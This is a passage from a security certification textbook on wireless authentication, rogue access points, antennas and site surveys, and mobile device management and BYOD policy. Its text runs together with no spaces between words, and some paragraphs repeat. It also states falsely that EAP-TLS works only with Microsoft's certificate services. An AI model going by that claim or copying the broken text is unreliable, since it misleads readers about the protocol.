wouldbecompromised,andtheattackercouldnotusetheWEPkeytoconnecttotheAP.ThisstandardauthenticatestheclienttotheAP,butitalsoauthenticatestheAPtotheclient,helpingtoavoidman-in-the-middleattacks.ThemainproblemwiththeEAP-TLSprotocolisthatitisdesignedtoworkonlywithMicrosoft’sActiveDirectoryandCertificateServices;itwillnottakecertificatesfromothercertificateissuers.Thusamixedenvironmentwouldhaveimplementationproblems.Asdiscussedearlier,EAP-TTLSworksmuchthesamewayasEAP-
TLS,withtheserverauthenticatingtotheclientwithacertificate,buttheprotocoltunnelstheclientsideoftheauthentication,allowingtheuseoflegacyauthenticationprotocolssuchasPasswordAuthenticationProtocol(PAP),Challenge-HandshakeAuthenticationProtocol(CHAP),MS-CHAP,orMS-CHAP-V2.ThismakestheprotocolmoreversatilewhilestillsupportingtheenhancedsecurityfeaturessuchasdynamicWEPkeyassignment.EAP-MD5,whileitdoesimprovetheauthenticationoftheclienttothe
AP,doeslittleelsetoimprovethesecurityofyourAP.TheprotocolworksbyusingtheMD5encryptionprotocoltohashauser’susernameandpassword.Thisprotocol,unfortunately,providesnowayfortheAPtoauthenticatewiththeclient,anditdoesnotprovidefordynamicWEPkeyassignment.Inthewirelessenvironment,withoutstrongtwo-wayauthentication,itisveryeasyforanattackertoperformaman-in-the-middleattack.Normally,thesetypesofattacksaredifficulttoperform,requiringatrafficredirectofsomekind,butwirelesschangesallthoserules.BysettinguparogueAP,anattackercanattempttogetclientstoconnecttoitasifitwereauthorizedandthensimplyauthenticatetotherealAP,asimplewaytohaveaccesstothenetworkandtheclient’scredentials.TheproblemofnotdynamicallygeneratingWEPkeysisthatitsimplyopensupthenetworktothesamelackofconfidentialitytowhichanormalAPisvulnerable.AnattackerhastowaitonlyforenoughtraffictocracktheWEPkey,andhecanthenobservealltrafficpassingthroughthenetwork.BecausethesecurityofwirelessLANshasbeensoproblematic,many
usershavesimplyswitchedtoalayeredsecurityapproach—thatis,theyhavemovedtheirAPstountrustworthyportionsofthenetworkandhaveforcedallclientstoauthenticatethroughthefirewalltoathird-partyVPNsystem.TheadditionalsecuritycomesatapriceofputtingmoreloadonthefirewallandVPNinfrastructureandpossiblyaddingcumbersomesoftwaretotheusers’devices.Whilewirelesscanbesetupinaverysecuremannerinthisfashion,itcanalsobesetuppoorly.Somesystemslackstrongauthenticationofbothendpoints,leadingtopossibilitiesofaman-in-the-middleattack.Also,eventhoughthedataistunneledthrough,IPaddressesarestillsentintheclear,givinganattackerinformationaboutwhatandwhereyourVPNendpointis.Anotherphenomenonofwirelessisborneoutofitswideavailability
andlowprice.AllthesecuritymeasuresofthewiredandwirelessnetworkcanbedefeatedbytherogueAP.Thisisthethirdpossibletypeofrogueaccesspointdiscussedinthischapter;theyallsharethesamenameastheyallrepresentasecuritybreach.However,sincetheyareimplementedwithdifferentmotivesandaccordinglyposeslightlydifferentthreats,wediscussthemallseparately.Inthiscase,awell-intentionedemployeewhoistryingtomaketheworkenvironmentmoreconvenientpurchasesanAPatalocalretailerandinstallsit.Wheninstalled,itworksfine,butittypicallywillhavenosecurityinstalled.SincetheITdepartmentdoesn’tknowaboutit,itisanuncontrolledentrypointintothenetwork.NomatterwhatkindofrogueAPwearedealingwith,therogueAP
mustbedetectedandcontrolled.ThemostcommonwaytocontrolrogueAPsissomeformofwirelessscanningtoensureonlylegitimatewirelessisinplaceatanorganization.WhilecompletewirelessIDSswilldetectAPs,thiscanalsobedonewithalaptopandfreesoftware.
TryThis!ScanningforRogueWirelessOnceyouhavecompletedLabProject12.1andhaveNetStumblerorKismetinstalledonthecomputer,takeittoseverallocationsaroundyourworkplaceorschoolandattempttoscanfor
wirelessaccesspointsthatshouldnotbethere.
CCMPAspreviouslymentionedinthediscussionofWPA2,CCMPstandsforCounterModewithCipherBlockChaining–MessageAuthenticationCodesProtocol(orCounterModewithCBC-MACProtocol).CCMPisadataencapsulationencryptionmechanismdesignedforwirelessuse.CCMPisactuallythemodeinwhichtheAEScipherisusedtoprovidemessageintegrity.UnlikeWPA,CCMPrequiresnewhardwaretoperformtheAESencryption.
MACFilteringMACfilteringistheselectiveadmissionofpacketsbasedonalistofapprovedMediaAccessControl(MAC)addresses.Employedonswitches,thismethodisusedtoprovideameansofmachineauthentication.Inwirednetworks,thisenjoystheprotectionaffordedbythewires,makinginterceptionofsignalstodeterminetheirMACaddressesdifficult.Inwirelessnetworks,thissamemechanismsuffersfromthefactthatanattackercanseetheMACaddressesofalltraffictoandfromtheaccesspoint,andthencanspooftheMACaddressesthatarepermittedtocommunicateviatheaccesspoint.
ExamTip:MACfilteringcanbeemployedonwirelessaccesspoints,butcanbebypassedbyattackersobservingallowedMACaddressesandspoofingtheallowedMACaddressforthewirelesscard.
WirelessSystemsConfigurationWirelesssystemsaremorethanjustprotocols.Puttingupafunctional
wirelesssysteminahouseisaseasyasplugginginawirelessaccesspointandconnecting.Butinanenterprise,wheremultipleaccesspointswillbeneeded,theconfigurationtakessignificantlymorework.Sitesurveysareneededtodetermineproperaccesspointandantennaplacement,aswellaschannelsandpowerlevels.
AntennaTypesThestandardaccesspointisequippedwithanomnidirectionalantenna.Omnidirectionalantennasoperateinalldirections,makingtherelativeorientationbetweendeviceslessimportant.Omnidirectionalantennascoverthegreatestareaperantenna.Theweaknessoccursincornersandhard-to-reachareas,aswellasboundariesofafacilitywheredirectionalantennasareneededtocompletecoverage.Figure12.7showsasamplingofcommonWi-Fiantennas:(a)isacommonhomewirelessrouter,(b)isacommercialindoorwirelessaccesspoint,and(c)isanoutdoordirectionalantenna.Thesecanbevisibleasshown,orhiddenaboveceilingtiles.
•Figure12.7Wirelessaccesspointantennas
WirelessnetworkingproblemscausedbyweaksignalstrengthcansometimesbesolvedbyinstallingupgradedWi-Firadioantennasontheaccesspoints.Onbusinessnetworks,thecomplexityofmultipleaccesspointstypicallyrequiresacomprehensivesitesurveytomaptheWi-Fi
signalstrengthinandaroundofficebuildings.Additionalwirelessaccesspointscanthenbestrategicallyplacedwhereneededtoresolvedeadspotsincoverage.Forsmallbusinessesandhomes,whereasingleaccesspointmaybeallthatisneeded,anantennaupgrademaybeasimplerandmorecost-effectiveoptiontofixWi-Fisignalproblems.TwocommonformsofupgradedantennasaretheYagiantennaandthe
panelantenna.AnexampleofaYagiantennaisshowninFigure12.7(c).BothYagiandpanelantennasaredirectionalinnature,spreadingtheRFenergyinamorelimitedfield,increasingeffectiverangeinonedirectionwhilelimitingitinothers.Panelantennascanprovidesolidroomperformancewhilepreventingsignalbleedbehindtheantennas.Thisworkswellontheedgeofasite,limitingthestrayemissionsthatcouldbecapturedoffsite.Yagiantennasactmorelikearifle,funnelingtheenergyalongabeam.Thisallowsmuchlongercommunicationdistancesusingstandardpower.Thisalsoenableseavesdropperstocapturesignalsfrommuchgreaterdistancesbecauseofthegainprovidedbytheantennaitself.
AntennaPlacementWi-Fiisbynaturearadio-basedmethodofcommunication,andassuchusesantennastotransmitandreceivethesignals.Theactualdesignandplacementoftheantennascanhaveasignificanteffectontheusabilityoftheradiofrequency(RF)mediumforcarryingthetraffic.Antennascomeinavarietyoftypes,eachwithitsowntransmissionpatternandgainfactor.High-gainantennascandealwithweakersignals,butalsohavemore-limitedcoverage.Wide-coverage,omnidirectionalantennascancoverwiderareas,butatlowerlevelsofgain.Theobjectiveofantennaplacementistomaximizethecoverageoveraphysicalareaandreducelow-gainareas.Thiscanbeverycomplexinbuildingswithwalls,electricalinterference,andothersourcesofinterferenceandfrequentlyrequiresasitesurveytodetermineproperplacement.
ExamTip:Becausewirelessantennascantransmitoutsideafacility,tuningandplacementofantennascanbecrucialforsecurity.Adjustingradiatedpowerthroughthepowerlevelcontrolswillassistinkeepingwirelesssignalsfrombeingbroadcastoutsideareasunderphysicalaccesscontrol.
MIMOMIMOisasetofmultiple-inputandmultiple-outputantennatechnologieswheretheavailableantennasarespreadoveramultitudeofindependentaccesspointseachhavingoneormultipleantennas.Thiscanenhancetheusablebandwidthanddatatransmissioncapacitybetweentheaccesspointanduser.ThereareawidevarietyofMIMOmethods,andthistechnology,onceconsideredcuttingedgeoradvanced,isbecomingmainstream.
PowerLevelControlsWi-Fipowerlevelscanbecontrolledbythehardwareforavarietyofreasons.Thelowerthepowerused,thelesstheopportunityforinterference.Butifthepowerlevelsaretoolow,thensignalstrengthlimitsrange.Accesspointscanhavethepowerlevelseteithermanuallyorviaprogrammaticcontrol.Formostusers,powerlevelcontrolsarenotveryuseful,andleavingtheunitindefaultmodeisthebestoption.Incomplexenterprisesetups,withsitesurveysandplannedoverlappingzones,thisaspectofsignalcontrolcanbeusedtoincreasecapacityandcontrolonthenetwork.
SiteSurveysWhendevelopingacoveragemapforacomplexbuildingsite,youneedtotakeintoaccountawidevarietyoffactors,particularlywalls,interferingsources,andfloorplans.Asitesurveyinvolvesseveralsteps:mappingthe
floorplan,testingforRFinterference,testingforRFcoverage,andanalysisofmaterialviasoftware.Thesoftwarecansuggestplacementofaccesspoints.AfterdeployingtheAPs,thesiteissurveyedagain,mappingtheresultsversusthepredicted,watchingsignalstrengthandsignal-to-noiseratios.Figure12.8illustrateswhatasitesurveylookslike.Thedifferentshadesindicatesignalstrength,showingwherereceptionisstrongandwhereitisweak.Sitesurveyscanbeusedtoensureavailabilityofwireless,especiallywhenit’scriticalforuserstohaveconnections.
•Figure12.8Examplesitesurvey
ExamTip:Wirelessnetworksaredependentuponradiosignalstofunction.Itisimportantto
understandthatantennatype,placement,andsitesurveysareusedtoensurepropercoverageofasite,includingareasblockedbywalls,interferingsignals,andechoes.
CaptivePortalsCaptiveportalreferstoaspecifictechniqueofusinganHTTPclienttohandleauthenticationonawirelessnetwork.Frequentlyemployedinpublichotspots,acaptiveportalopensawebbrowsertoanauthenticationpage.Thisoccursbeforetheuserisgrantedadmissiontothenetwork.Theaccesspointusesthissimplemechanismbyinterceptingallpacketsandreturningthewebpageforlogin.Theactualwebserverthatservesuptheauthenticationpagecanbeinawalled-offsectionofthenetwork,blockingaccesstotheInternetuntiltheusersuccessfullyauthenticates.
SecuringPublicWi-FiPublicWi-Fiisacommonperkthatsomefirmsprovidefortheircustomersandvisitors.WhenprovidingaWi-Fihotspot,evenfreeopen-to-the-publicWi-Fi,securityshouldstillbeaconcern.Oneoftheissuesassociatedwithwirelesstransmissionsisthattheyaresubjecttointerceptionbyanyonewithinrangeofthehotspot.Thismakesitpossibleforotherstointerceptandreadtrafficofanyoneusingthehotspot,unlessencryptionisused.Forthisreason,ithasbecomecommonpracticetousewirelesssecurity,evenwhentheintentistoopenthechannelforeveryone.Havingadefaultpassword,evenonethateveryoneknows,willmakeitsothatpeoplecannotobserveothertraffic.Thereisanentireopenwirelessmovement,designedaroundasharing
conceptthatpromotessharingoftheInternettoall.Forinformation,checkouthttps://openwireless.org.
MobileDevicesThissectionwillreviewalargenumberoftopicsspecifictomobile
devices.You’lllikelyfindthatthesecurityprinciplesyou’vealreadylearnedapplyandjustneedtobeadaptedtomobiletechnologies.Thisisoneofthefastest-changingareasofcomputersecuritybecausemobiletechnologyislikelythefastest-changingtechnology.
Althoughthedatatransmissionsbetweenmanymobiledevicesaresecuredviacarriermethods(GSM)anddevicemethods(RIMBlackberry),voicetransmissionshavebeeninterceptedandlaterusedtoembarrasstheparties.Third-partyvoiceencryptionmethodsexistforsmartphones,butareconsideredexpensiveanddifficulttodeploybymostpeople.Theyalsosufferfromtheproblemthatbothendsofaconversationneedthedevicetohaveasecuredcommunication.Asmoreandmorebusinessesfindvalueinsecuredvoicecommunications,thissolutionmaybecomemainstreaminthefuture.
Manymobiledeviceshavesignificantstoragecapacity,allowingthemtotransferfilesanddata.Datamustbeprotected,devicesmustbeproperlyconfigured,andgooduserhabitsmustbeencouraged.Thismakesmobiledevicesnodifferentfromanyothermobilemediasource,capableofcarryinganddeliveringviruses,worms,andotherformsofmalware.Theyarealsocapableofremovingdatafromwithinanetwork,inthecaseofaninsiderattack.MobiledevicesarealsocommonlyBluetoothenabled,makingvariouswirelessattacksagainstthedevicearisk.Onereasontoattackthemobiledeviceistouseittorelaytheattackontotheinternalnetworkwhenthedeviceissyncedup.BluetoothattacksarecoveredinChapter12.
MobileDeviceSecuritySecurityprinciplessimilartothoseapplicabletolaptopcomputersmustbefollowedwhenusingmobiledevicessuchassmartphonesandtabletcomputingdevices.Datamustbeprotected,devicesmustbeproperlyconfigured,andgooduserhabitsmustbeencouraged.Thischapterwillreviewalargenumberoftopicsspecifictomobiledevices.You’lllikelyfindthatthesecurityprinciplesyou’vealreadylearnedapplyandjustneed
tobeadaptedtomobiletechnologies.Thisisoneofthefastest-changingareasofcomputersecuritybecausemobiletechnologyislikelythefastest-changingtechnology.
FullDeviceEncryptionJustaslaptopcomputersshouldbeprotectedwithwholediskencryptiontoprotectthelaptopincaseoflossortheft,youmayneedtoconsiderencryptionformobiledevicesusedbyyourcompany’semployees.Mobiledevicesaremuchmorelikelytobelostorstolen,soyoushouldconsiderencryptingdataonyourdevices.Moreandmore,mobiledevicesareusedwhenaccessingandstoringbusiness-criticaldataorothersensitiveinformation.Protectingtheinformationonmobiledevicesisbecomingabusinessimperative.Thisisanemergingtechnology,soyou’llneedtocompletesomerigorousmarketanalysistodeterminewhatcommercialproductmeetsyourneeds.
RemoteWipingToday’smobiledevicesarealmostinnumerableandareverysusceptibletolossandtheft.Further,itisunlikelythatalostorstolendevicewillberecovered,thusmakingevenencrypteddatastoredonadevicemorevulnerabletodecryption.Ifthethiefcanhaveyourdeviceforalongtime,hecantakeallthetimehewantstotrytodecryptyourdata.Therefore,manycompaniesprefertojustremotelywipealostorstolendevice.Remotewipingamobiledevicetypicallyremovesdatastoredonthedeviceandresetsthedevicetofactorysettings.ThereisadilemmaintheuseofBYOD(bringyourowndevice)devicesthatstorebothpersonalandenterprisedata.Wipingthedeviceusuallyremovesalldata,bothpersonalandenterprise.Therefore,ifcorporatepolicyrequireswipingalostdevicethatmaymeanthedevice’suserlosespersonalphotosanddata.Thesoftwarecontrolsforseparatedatacontainers,oneforbusinessandoneforpersonal,areoneofthereasonsforenterprisestoadoptmobiledevicemanagement(MDM)solutions.
LockoutAuserlikelywilldiscoverinarelativelyshorttimethatthey’velosttheirdevice,soaquickwaytoprotecttheirdeviceistoremotelylockthedeviceassoonastheyrecognizeithasbeenlostorstolen.Severalproductsareavailableonthemarkettodaytohelpenterprisesmanagetheirdevices.Remotelockoutisusuallythefirststeptakeninsecuringamobiledevice.
Screen-locksMostcorporatepoliciesregardingmobiledevicesrequiretheuseofthemobiledevice’sscreen-lockingcapability.ThisusuallyconsistsofenteringapasscodeorPINtounlockthedevice.Itishighlyrecommendedthatscreenlocksbeenforcedforallmobiledevices.Yourpolicyregardingthequalityofthepasscodeshouldbeconsistentwithyourcorporatepasswordpolicy.However,manycompaniesmerelyenforcetheuseofscreen-locking.Thus,userstendtouseconvenientoreasy-to-rememberpasscodes.Somedevicesallowcomplexpasscodes.AsshowninFigure12.9,thedevicescreenontheleftsupportsonlyasimpleiOSpasscode,limitedtofournumbers,whilethedevicescreenontherightsupportsapasscodeofindeterminatelengthandcancontainalphanumericcharacters.
•Figure12.9iOSlockscreens
Somemoreadvancedformsofscreen-locksworkinconjunctionwithdevicewiping.Ifthepasscodeisenteredincorrectlyaspecifiednumberoftimes,thedeviceisautomaticallywiped.ThisisoneofthesecurityfeaturesofBlackBerrythathastraditionallymadeitofinteresttosecurity-conscioususers.ApplehasmadethisanoptiononneweriOSdevices.Applealsoallowsremotelockingofadevicefromtheuser’siCloudaccount.
TechTip
MobileDeviceSecurityMobiledevicesrequirebasicsecuritymechanismsofscreen-locks,lockouts,devicewiping,andencryptiontoprotectsensitiveinformationcontainedonthem.
GPSMostmobiledevicesarenowcapableofusingtheGlobalPositioningSystem(GPS)fortrackingdevicelocation.ManyappsrelyheavilyonGPSlocation,suchasdevice-locatingservices,mappingapps,trafficmonitoringapps,andappsthatlocatenearbybusinessessuchasgasstationsandrestaurants.Suchtechnologycanbeexploitedtotrackmovementlocationofthemobiledevice.Thistrackingcanbeusedtoassistintherecoveryoflostdevices.
StorageSegmentationOnmobiledevices,itcanbeverydifficulttokeeppersonaldataseparatefromcorporatedata.Somecompanieshavedevelopedcapabilitiestocreateseparatevirtualcontainerstokeeppersonaldataseparatefromcorporatedataandapplications.Fordevicesthatareusedtohandlehighly
sensitivecorporatedata,thisformofprotectionishighlyrecommended.
AssetControlBecauseeachusercanhavemultipledevicesconnectingtothecorporatenetwork,itisimportanttoimplementaviableassettrackingandinventorycontrolmechanism.Forsecurityandliabilityreasons,thecompanyneedstoknowwhatdevicesareconnectingtoitssystemsandwhataccesshasbeengranted.JustasinITsystems,maintainingalistofapproveddevicesisacriticalcontrol.
MobileDeviceManagementMobiledevicemanagement(MDM)isoneofthehottesttopicsindevicesecuritytoday.MDMbeganasamarketingtermforacollectivesetofcommonlyemployedprotectionelementsassociatedwithmobiledevices.Whenviewedasacomprehensivesetofsecurityoptionsformobiledevices,everycorporationshouldhaveandenforceanMDMpolicy.Thepolicyshouldrequire
Devicelockingwithastrongpassword
Encryptionofdataonthedevice
Devicelockingautomaticallyafteracertainperiodofinactivity
Thecapabilitytoremotelylockthedeviceifitislostorstolen
Thecapabilitytowipethedeviceautomaticallyafteracertainnumberoffailedloginattempts
Thecapabilitytoremotelywipethedeviceifitislostorstolen
Passwordpoliciesshouldextendtomobiledevices,includinglockoutand,ifpossible,theautomaticwipingofdata.Corporatepolicyfordataencryptiononmobiledevicesshouldbeconsistentwiththepolicyfordataencryptiononlaptopcomputers.Inotherwords,ifyoudon’trequireencryptionofportablecomputers,thenshouldyourequireitformobile
devices?Thereisnotauniformanswertothisquestion;mobiledevicesaremuchmoremobileinpracticethanlaptops,andmorepronetoloss.Thisisultimatelyariskquestionthatmanagementmustaddress:Whatistheriskandwhatarethecostsoftheoptionsemployed?Thisalsoraisesabiggerquestion:Whichdevicesshouldhaveencryptionasabasicsecurityprotectionmechanism?Isitbydevicetype,orbyuserbasedonwhatdatawouldbeexposedtorisk?Fortunately,MDMsolutionsexisttomakethechoicesmanageable.
ExamTip:Mobiledevicemanagement(MDM)isamarketingtermforacollectivesetofcommonlyemployedprotectionelementsassociatedwithmobiledevices.
DeviceAccessControlTheprinciplesofaccesscontrolformobiledevicesneedtobemanagedjustlikeaccesscontrolfromwiredorwirelessdesktopsandlaptops.ThiswillbecomemorecriticalasstorageinthecloudandSoftwareasaService(SaaS)becomemoreprevalent.Emergingtablet/mobiledevicesharingintendstoprovidetheuserwithaseamlessdataaccessexperienceacrossmanydevices.Dataaccesscapabilitieswillcontinuetoevolvetomeetthisneed.Rigorousdataaccessprinciplesneedtobeapplied,andtheybecomeevenmoreimportantwiththeinclusionofmobiledevicesasfullyfunctionalcomputingdevices.Whenreviewingpossiblesolutions,itisimportanttoconsiderseekingproofofsecurityandproceduresratherthanrelyingonmarketingbrochures.
RemovableStorageBecauseremovabledevicescanmovedataoutsideofthecorporate-controlledenvironment,theirsecurityneedsmustbeaddressed.Removabledevicescanbringunprotectedorcorrupteddataintothecorporateenvironment.Allremovabledevicesshouldbescannedby
antivirussoftwareuponconnectiontothecorporateenvironment.Corporatepoliciesshouldaddressthecopyingofdatatoremovabledevices.ManymobiledevicescanbeconnectedviaUSBtoasystemandusedtostoredata—andinsomecasesvastquantitiesofdata.Thiscapabilitycanbeusedtoavoidsomeimplementationsofdatalosspreventionmechanisms.
DisablingUnusedFeaturesAswithallcomputingdevices,featuresthatarenotusedorthatpresentasecurityriskshouldbedisabled.Bluetoothaccessisparticularlyproblematic.ItisbesttomakeBluetoothconnectionsundiscoverable.But,userswillneedtoenableittopairwithanewheadsetorcarconnection,forexample.RequiringBluetoothconnectionstobeundiscoverableisveryhardtoenforcebutshouldbeencouragedasabestpractice.UsersshouldreceivetrainingastotherisksofBluetooth—notsotheyavoidBluetooth,butsotheyunderstandwhentheyshouldturnitoff.Havingamobiledevicewithaccesstosensitiveinformationcarrieswithitalevelofresponsibility.Helpingusersunderstandthisandactaccordinglycangoalongwaytowardsecuringmobiledevices.
BYODConcernsPermittingemployeesto“bringyourowndevice”(BYOD)hasmanyadvantagesinbusiness,andnotjustfromtheperspectiveofdevicecost.Userstendtopreferhavingasingledeviceratherthancarryingmultipledevices.Usershavelessofalearningcurveondevicestheyalreadyhaveaninterestinlearning.
DataOwnershipBYODblursthelinesofdataownershipbecauseitblursthelinesofdevicemanagement.Ifacompanyownsasmartphoneissuedtoanemployee,thecompanycanrepossessthephoneuponemployee
termination.Thispracticemayprotectcompanydatabykeepingthecompany-issueddevicesinthehandsofemployeesonly.However,acompanycannotrelyonasimplefactoryresetbeforereissuingadevice,becausefactoryresettingmaynotremoveallthedataonthedevice.Ifadeviceisreissued,itispossiblethatsomeofthepreviousowner’spersonalinformation,suchasprivatecontacts,stillremainsonthedevice.Ontheotherhand,iftheemployee’sdeviceisapersonaldevicethathasbeenusedforbusinesspurposes,uponterminationoftheemployee,itislikelythatsomecompanydataremainsonthephonedespitethecompany’sbesteffortstoremoveitsdatafromthedevice.Ifthatdeviceisresoldorrecycled,thecompany’sdatamayremainonthedeviceandbepassedontothesubsequentowner.Keepingbusinessdatainseparate,MDM-managedcontainersisonemethodofdealingwiththisissue.
TechTip
BYODConcernsThereisadilemmaintheuseofBYODdevicesthatstorebothpersonalandenterprisedata.Wipingthedeviceusuallyremovesalldata,bothpersonalandenterprise.Therefore,ifcorporatepolicyrequireswipingalostdevice,thatpolicymaymeanthedevice’suserlosespersonalphotosanddata.Thesoftwarecontrolsforseparatedatacontainers,oneforbusinessandoneforpersonal,havebeenproposedbutarenotamainstreamoptionyet.
StorageSegmentationOnmobiledevices,itcanbeverydifficulttokeeppersonaldataseparatefromcorporatedata.Somecompanieshavedevelopedcapabilitiestocreateseparatevirtualcontainerstokeeppersonaldataseparatefromcorporatedataandapplications.Fordevicesthatareusedtohandlehighlysensitivecorporatedata,thisformofprotectionishighlyrecommended.
SupportOwnershipSupportcostsformobiledevicesareanimportantconsiderationfor
corporations.Eachdevicehasitsownimplementationofvariousfunctions.Whilethosefunctionstypicallyareimplementedagainstaspecification,softwareimplementationsmaynotfullyorproperlyimplementthespecification.Thismayresultinincreasedsupportcallstoyourhelpdeskorsupportorganization.Itisverydifficultforacorporatehelpdesktobeknowledgeableonallaspectsofallpossibledevicesthataccessacorporatenetwork.Forexample,yoursupportorganizationmustbeabletotroubleshootiPhones,Androiddevices,tablets,andsoforth.Thesedevicesareupdatedfrequently,newdevicesarereleased,andnewcapabilitiesareaddedonaregularbasis.Yoursupportorganizationwillneedviableknowledgebasearticlesandjobaidsinordertoprovidesufficientsupportforthewidevarietyofever-changingdevices.
PatchManagementJustasyourcorporatepolicyshouldenforcethepromptupdateofdesktopandlaptopcomputerstohelpeliminatesecurityvulnerabilitiesonthoseplatforms,itshouldalsorequiremobiledevicestobekeptcurrentwithrespecttopatches.Havingthelatestapplications,operatingsystem,andsoonisanimportantbestdefenseagainstviruses,malware,andotherthreats.Itisimportanttorecognizethat“jailbreaking”or“rooting”yourdevicemayremovethemanufacturer’ssecuritymechanismsandprotectionagainstmalwareandotherthreats.ThesedevicesmayalsonolongerbeabletoupdatetheirapplicationsorOSagainstknownissues.Jailbreakingorrootingisalsoamethodusedtobypasssecuritymeasuresassociatedwiththedevicemanufacturercontrol,andinsomelocations,thiscanbeillegal.Mobiledevicesthatarejailbrokenorrootedshouldnotbetrustedonyourenterprisenetworkorallowedtoaccesssensitivedata.
AntivirusManagementJustlikedesktopandlaptopcomputers,smartphones,tablets,andothermobiledevicesneedprotectionagainstvirusesandmalware.Itisimportantthatcorporatepolicyandpersonalusagekeepoperatingsystemsandapplicationscurrent.Antivirusandmalwareprotectionshouldbe
employedaswidelyaspossibleandkeptup-to-dateagainstcurrentthreats.
ForensicsMobiledeviceforensicsisarapidlyevolvingandfast-changingfield.Becausedevicesareevolvingsoquicklyandchangingsofast,itisdifficulttostaycurrentinthisfield.Solidforensicsprinciplesshouldalwaysbefollowed.DevicesshouldbeproperlyhandledbyusingRF-shieldedbagsorcontainers.Becauseoftherapidchangesinthisarea,it’sbesttoengagethehelpoftrainedforensicspecialiststoensuredataisn’tcontaminatedandthedevicestateandmemoryareunaltered.Ifforensicsareneededonadevicethathasbothpersonalandbusinessdata,thenpoliciesneedtobeinplacetocovertheappropriateprivacyprotectionsonthepersonalsideofthedevice.
PrivacyWhenanemployeeuseshispersonaldevicetoperformhisworkforthecompany,hemayhavestrongexpectationsthatprivacywillbeprotectedbythecompany.Thecompanypolicyneedstoconsiderthisandaddressitexplicitly.Oncompany-owneddevices,it’squiteacceptableforthecompanytoreservetherighttoaccessandwipeanycompanydataonthedevice.Thecompanycanthusstatethattheusercanhavenoexpectationofprivacywhenusingacompanydevice.Butwhenthedeviceisapersonaldevice,theusermayfeelstrongerownership.Expectationsofprivacyanddataaccessonpersonaldevicesshouldbeincludedinyourcompanypolicy.
On-boardCamera/VideoManymobiledevicesincludeon-boardcameras,andthephotos/videostheytakecandivulgeinformation.Thisinformationcanbeassociatedwithanythingthecameracanimage—whiteboards,documents,eventhelocationofthedevicewhenthephoto/videowastakenviageo-tagging.Anotherchallengepresentedbymobiledevicesisthepossibilitythatthey
willbeusedforillegalpurposes.Thiscancreateliabilityforthecompanyifitisacompany-owneddevice.Despiteallthepotentiallegalconcerns,possiblythegreatestconcernofmobiledeviceusersisthattheirpersonalphotoswillbelostduringadevicewipeoriginatedbythecompany.
On-boarding/Off-boardingMostcompaniesandindividualsfinditrelativelyeasytoconnectmobiledevicestothecorporatenetwork.OftentherearenotcontrolsaroundconnectingadeviceotherthanhavingaMicrosoftExchangeaccount.Whennewemployeesjoinacompany,theon-boardingprocessesneedtoincludeprovisionsformobiledeviceresponsibilities.Itiseasyfornewemployeestobypasssecuritymeasuresiftheyarenotpartofthebusinessprocessofon-boarding.Employeeterminationneedstobemodifiedtoincludeterminationof
accountsonmobiledevices.It’snotuncommontofindterminatedemployeeswithaccountsorevencompanydevicesstillconnectingtothecorporatenetworkmonthsafterbeingterminated.E-mailaccountsshouldberemovedpromptlyaspartoftheemployeeterminationpolicyandprocess.Mobiledevicessuppliedbythecompanyshouldbecollectedupontermination.BYODequipmentshouldhaveitsaccesstocorporateresourcesterminatedaspartoftheoff-boardingprocess.Regularauditsforoldorunterminatedaccountsshouldbeperformedtoensurepromptdeletionofaccountsforterminatedemployees.
AdherencetoCorporatePoliciesYourcorporatepoliciesregardingBYODdevicesshouldbeconsistentwithyourexistingcomputersecuritypolicies.Yourtrainingprogramsshouldincludeinstructiononmobiledevicesecurity.Disciplinaryactionsshouldbeconsistent.Yourmonitoringprogramsshouldbeenhancedtoincludemonitoringandcontrolofmobiledevices.
UserAcceptance
BYODinherentlycreatesaconflictbetweenpersonalandcorporateinterests.Anemployeewhousesherowndevicetoconductcorporatebusinessinherentlyfeelsstrongownershipoverthedeviceandmayresentcorporatedemandstocontrolcorporateinformationdownloadedtothedevice.Ontheotherhand,thecorporationexpectsthatcorporatedatabeproperlycontrolledandprotectedandthusdesirestoimposeremotewipingorlockoutrequirementsinordertoprotectcorporatedata.Anindividualwholosesherpersonalphotosfromaspecialeventwilllikelyharborillfeelingstowardthecorporationifitwipesherdevice,includingthoseirreplaceablephotos.YourcorporateBYODpolicyneedstobewelldefined,approvedbythecorporatelegaldepartment,andclearlycommunicatedtoallemployeesthroughtraining.
Architecture/InfrastructureConsiderationsMobiledevicesconsumeconnectionstoyourcorporateITinfrastructure.Itisnotunusualnowforasingleindividualtobeconnectedtothecorporateinfrastructurewithoneormoresmartphones,tablets,andlaptopordesktopcomputers.Someinfrastructureimplementationsinthepasthavenotbeenefficientintheirdesign,sometimesconsumingmultipleconnectionsforasingledevice.Thiscanreducethenumberofavailableconnectionsforotherendusers.Itisrecommendedthatloadtestingbeperformedtoensurethatyourdesignorexistinginfrastructurecansupportthepotentiallylargenumberofconnectionsfrommultipledevices.Multipleconnectionscanalsocreatesecurityissueswhenthesystem
tracksuseraccountsagainstmultipleconnections.Userswillneedtobeawareofthis,sothattheydon’tinadvertentlycreateincidentresponsesituationsorfindthemselveslockedoutbytheirownactions.Thiscanbeatrickyissuerequiringabitmoreintelligentdesignthanthetraditionalphilosophyofoneuseridequalsonecurrentconnection.
LegalConcernsItshouldbeapparentfromthevarioustopicsdiscussedinthischapterthattherearemanysecuritychallengespresentedbymobiledevicesusedfor
corporatebusiness.Becausethetechnologyisrapidlychanging,it’sbesttomakesureyouhavesolidlegalreviewofpolicies.Therearebothlegalandpublicrelationconcernswhenitcomestomobiledevices.Employeeswhousebothcompany-ownedandpersonaldeviceshaveresponsibilitieswhencompanydataisinvolved.Policiesandproceduresshouldbereviewedonaregularbasistostaycurrentwithtechnology.Anotherchallengepresentedbymobiledevicesisthepossibilitythat
theywillbeusedforillegalpurposes.Thiscancreateliabilityforthecompanyifitisacompany-owneddevice.
AcceptableUsePolicySimilartoyouracceptableusepoliciesforlaptopsanddesktops,yourmobiledevicepoliciesshouldaddressacceptableuseofmobileorBYODdevices.Authorizedusageofcorporatedevicesforpersonalpurposesshouldbeaddressed.Disciplinaryactionsforviolationofmobiledevicepoliciesshouldbedefined.BYODoffersboththecompanyandtheuseradvantages;ramificationsshouldbespecificallyspelledout,alongwiththespecificuserresponsibilities.
ExamTip:Mobiledevicesoffermanyusabilityadvantagesacrosstheenterprise,andtheycanbemanagedsecurelywiththehelpofsecurity-conscioususers.Securitypoliciescangoalongwaytowardassistingusersinunderstandingtheirresponsibilitiesassociatedwithmobiledevicesandsensitivedata.
